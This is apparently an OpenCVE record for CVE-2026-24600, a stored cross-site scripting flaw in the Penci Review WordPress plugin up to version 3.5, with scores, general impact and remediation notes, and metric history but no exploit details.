Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Review penci-review allows Stored XSS.This issue affects Penci Review: from n/a through <= 3.5.
Published: 2026-01-23
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Cross‑Site Scripting (Stored XSS)
Action: Update Plugin
AI Analysis

Impact

The Penci Review plugin stores user‑supplied data without proper sanitization, enabling stored cross‑site scripting attacks. This flaw allows an attacker to insert malicious scripts that execute in the browsers of visitors, potentially leading to session hijacking, defacement or malware delivery. The weakness is an input validation flaw (CWE‑79).

Affected Systems

The vulnerability affects the WordPress PenciReview plugin from its earliest release through version 3.5 inclusive, issued by PenciDesign.

Risk and Exploitability

The CVSS score of 6.5 indicates moderate risk, and an EPSS score of less than 1% suggests the likelihood of exploitation is low at present. The vulnerability is not listed in the CISA KEV catalog. Exploitation likely requires the ability to submit content that will be rendered by the plugin, although the CVE does not specify the exact attack vector. Detection is challenging because the payload is stored and only rendered later.

Generated by OpenCVE AI on April 28, 2026 at 17:49 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade PenciReview to the latest available version that addresses the XSS flaw.
  • If no update is available, remove the plugin or replace it with a trusted alternative that does not contain this weakness.
  • Implement custom input sanitization to ensure all user‑supplied data is escaped before rendering in HTML contexts.

Generated by OpenCVE AI on April 28, 2026 at 17:49 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

 cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

Mon, 26 Jan 2026 12:00:00 +0000

Type Values Removed Values Added
First Time appeared Wordpress
Wordpress wordpress
Vendors & Products Wordpress
Wordpress wordpress

Fri, 23 Jan 2026 21:15:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 23 Jan 2026 14:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PenciDesign Penci Review penci-review allows Stored XSS.This issue affects Penci Review: from n/a through <= 3.5.
Title WordPress Penci Review plugin <= 3.5 - Cross Site Scripting (XSS) vulnerability
Weaknesses CWE-79
References

Subscriptions

Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:14:50.188Z

Reserved: 2026-01-23T12:32:17.046Z

Link: CVE-2026-24600

cve-icon Vulnrichment

Updated: 2026-01-23T20:37:57.532Z

cve-icon NVD

Status : Deferred

Published: 2026-01-23T15:16:18.273

Modified: 2026-04-28T15:16:18.303

Link: CVE-2026-24600

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-28T18:00:14Z

Weaknesses